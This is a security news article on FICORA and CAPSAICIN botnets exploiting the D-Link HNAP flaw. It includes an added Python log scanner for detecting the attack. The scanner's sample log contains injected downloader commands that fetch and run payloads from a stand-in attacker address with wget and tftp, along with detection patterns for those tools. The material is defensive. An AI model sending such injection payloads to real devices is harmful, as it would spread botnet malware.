Surge in Botnet Activity Targeting D-Link Routers
Security researchers are warning about a recent rise in malicious activity that enlists vulnerable D-Link routers into two distinct botnets: a Mirai variant tracked as FICORA and a Kaiten variant tracked as CAPSAICIN.
Exploitation of HNAP Vulnerabilities
Vincent Li, a researcher at Fortinet FortiGuard Labs, noted in a Thursday analysis that both botnets rely on long-known vulnerabilities in D-Link devices. The attackers abuse a flaw in the Home Network Administration Protocol (HNAP) interface that lets them execute malicious commands on the router by sending a crafted GetDeviceSettings request.
Historical Context of Security Flaws
The oldest of the vulnerabilities exploited in these attacks was disclosed nearly ten years ago, and the same HNAP weakness has since resurfaced across many device models under several CVE identifiers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
Global Reach of FICORA and CAPSAICIN Attacks
Fortinet’s telemetry data indicates that attacks involving FICORA have been globally widespread, whereas CAPSAICIN has predominantly targeted regions in East Asia, including Japan and Taiwan. Notably, CAPSAICIN activity experienced intense peaks on October 21 and 22, 2024.
Operational Mechanism of the Botnets
The FICORA botnet is delivered by a downloader shell script that fetches the main payload, compiled for a range of Linux architectures, using whichever download tools are available on the device, such as wget, ftpget, curl, and tftp. The malware also includes a brute-force function driven by a hard-coded list of usernames and passwords, used to compromise additional hosts and grow the botnet.
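The two technical points above, the command injection through an HNAP GetDeviceSettings request and the downloader that pulls an architecture-specific payload with wget, curl, tftp or ftpget, together describe what a defender can look for in router-side HTTP logs. The following is an added detection example, not code from the article or from Fortinet. It assumes a constructed log format in which the SOAPAction header value is appended to each access-log line in quotes; the sample log lines and all IP addresses are constructed for illustration. A benign GetDeviceSettings call ends immediately after the action name, so anything containing shell metacharacters after it is flagged, and any download tool and IPv4 address found in the injected text are extracted as indicators.

```python
import re
from dataclasses import dataclass, field

# Constructed sample log (not from the article). Assumed format:
# <client ip> - - [<timestamp>] "<request line>" <status> <bytes> "<SOAPAction>"
# Benign HNAP traffic ends its SOAPAction right after the action name;
# the two flagged lines carry a downloader command after it.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Oct/2024:03:12:41 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "http://purenetworks.com/HNAP1/GetDeviceSettings"
198.51.100.7 - - [21/Oct/2024:03:12:45 +0000] "POST /HNAP1/ HTTP/1.1" 200 0 "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://203.0.113.5/d.sh; sh d.sh`"
198.51.100.7 - - [21/Oct/2024:03:13:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 0 "http://purenetworks.com/HNAP1/GetDeviceSettings/`tftp -g -r x.mips 203.0.113.5; chmod +x x.mips; ./x.mips`"
192.0.2.10 - - [21/Oct/2024:03:14:00 +0000] "GET /index.html HTTP/1.1" 200 3072 "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<soapaction>[^"]*)"$'
)
ACTION = "GetDeviceSettings"
# Shell metacharacters that have no business in a SOAPAction value.
SHELL_META = re.compile(r'[`;|&]|\$\(')
# Download tools named in the article as used by the FICORA downloader.
DOWNLOADERS = re.compile(r'\b(wget|curl|tftp|ftpget)\b')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


@dataclass
class Alert:
    src_ip: str
    timestamp: str
    tools: list = field(default_factory=list)   # download tools seen in the payload
    hosts: list = field(default_factory=list)   # IPv4 addresses the payload fetches from
    payload: str = ""


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_hnap_injection(rec):
    """True when an HNAP GetDeviceSettings request carries shell metacharacters
    after the action name, the shape of the command injection described above."""
    if not rec["path"].startswith("/HNAP1"):
        return False
    sa = rec["soapaction"]
    idx = sa.find(ACTION)
    if idx < 0:
        return False
    tail = sa[idx + len(ACTION):]
    return bool(SHELL_META.search(tail))


def scan(log_text):
    """Scan access-log text and return one Alert per suspected HNAP injection."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_hnap_injection(rec):
            continue
        payload = rec["soapaction"]
        tools = sorted(set(DOWNLOADERS.findall(payload)))
        # Exclude the attacking client itself; what remains is the payload host.
        hosts = sorted(set(IPV4.findall(payload)) - {rec["ip"]})
        alerts.append(Alert(rec["ip"], rec["ts"], tools, hosts, payload))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.timestamp} {a.src_ip} tools={a.tools} hosts={a.hosts}")
```

The check deliberately keys on the action name plus metacharacters rather than on a specific command string, so it also catches injected payloads that use a different downloader or none at all; the extracted hosts are the addresses worth blocking at the perimeter and feeding back into threat intelligence.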
CAPSAICIN’s Command Structure
CAPSAICIN is delivered by a downloader script served from a different IP address but built in the same way as FICORA's, fetching payloads for multiple Linux architectures. Once it has infected a device, CAPSAICIN waits for instructions from its operators, which can include executing commands to gather information about the host and launching DDoS attacks against specified targets.
Importance of Ongoing Device Maintenance
Even though the oldest of these vulnerabilities was publicly disclosed and patched almost ten years ago, attacks exploiting them continue worldwide, a sign of how many devices remain unpatched. Li emphasized the necessity for enterprises to consistently update their devices' software and implement robust monitoring practices to mitigate risks.